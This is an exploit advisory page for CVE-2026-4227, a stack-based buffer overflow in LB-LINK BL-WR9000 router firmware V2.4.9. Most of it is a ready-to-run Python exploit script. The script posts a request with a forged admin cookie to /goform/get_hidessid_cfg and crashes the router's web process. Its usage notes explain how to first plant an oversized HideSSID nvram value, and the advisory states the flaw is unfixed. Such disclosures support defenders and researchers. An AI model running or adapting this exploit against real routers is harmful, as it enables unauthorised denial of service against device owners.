LB-LINK BL-WR9000 V2.4.9 - Stack-based Buffer Overflow in /goform/get_hidessid_cfg

2026.03.17
Credit: Mohammed Idrees Banyamer
Risk: High
Local: No
Remote: Yes
CVE: CVE-2026-4227
CWE: CWE-121: Stack-based Buffer Overflow

#!/usr/bin/env python3 # Exploit Title: LB-LINK BL-WR9000 HideSSID Stack Overflow # CVE: CVE-2026-4227 # Date: 2026-03-16 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Affected: LB-LINK BL-WR9000 firmware V2.4.9 # Tested on: LB-LINK BL-WR9000 V2.4.9 # Category: Remote Denial of Service # Platform: Embedded (MIPS/ARM) # Exploit Type: Remote # CVSS: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) # Description: Stack-based buffer overflow in /goform/get_hidessid_cfg via overly long HideSSID nvram value # Fixed in: Not fixed (as of March 2026) # Usage: # python3 exploit.py <router_ip> # # Examples: # python3 exploit.py 192.168.16.1 # # Options: # -- (none implemented) # # Notes: # • Requires nvram value HideSSID to be set to a string longer than ~64 bytes before first ';' # • Example: nvram_set HideSSID 'A'*300';0;' ; nvram_commit # • Triggers crash of goahead web process (DoS) # # How to Use # # Step 1: # Set malicious nvram value (via shell or vulnerable web interface if possible): # nvram_set HideSSID 'A'*300';0;' # nvram_commit # # Step 2: # Run this script against the router: # python3 exploit.py 192.168.16.1 import requests import sys import time def main(): if len(sys.argv) != 2: print("Usage: python3 exploit.py <router_ip>") print("Example: python3 exploit.py 192.168.16.1") sys.exit(1) ip = sys.argv[1].strip() target = f"http://{ip}" url = f"{target}/goform/get_hidessid_cfg" headers = { "X-Requested-With": "XMLHttpRequest", "Accept-Language": "en", "Accept": "application/json, text/javascript, */*; q=0.01", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36", "Referer": f"{target}/admin/main.html", "Cookie": "platform=0; user=admin", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded", } data = "type=gethide2" print(f"[+] Target URL : {url}") print(f"[+] Payload : type=gethide2") print(f"[+] Cookie : {headers['Cookie']}") print("-"*50) try: print("[+] Sending exploit request...") start = time.time() response = requests.post( url, headers=headers, data=data, timeout=8, allow_redirects=False ) elapsed = time.time() - start print(f"[+] Status code: {response.status_code}") print(f"[+] Response : {response.text[:150]}...") except requests.exceptions.Timeout: print("[+] Router crashed (timeout) — Exploit successful!") except requests.exceptions.ConnectionError: print("[+] Connection refused / socket closed — Exploit successful!") except Exception as e: print(f"[!] Unexpected error: {e}") else: print("[?] No crash detected. Check HideSSID value.") print("\n[+] Done.") if __name__ == "__main__": main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2026, cxsecurity.com

 

Back to Top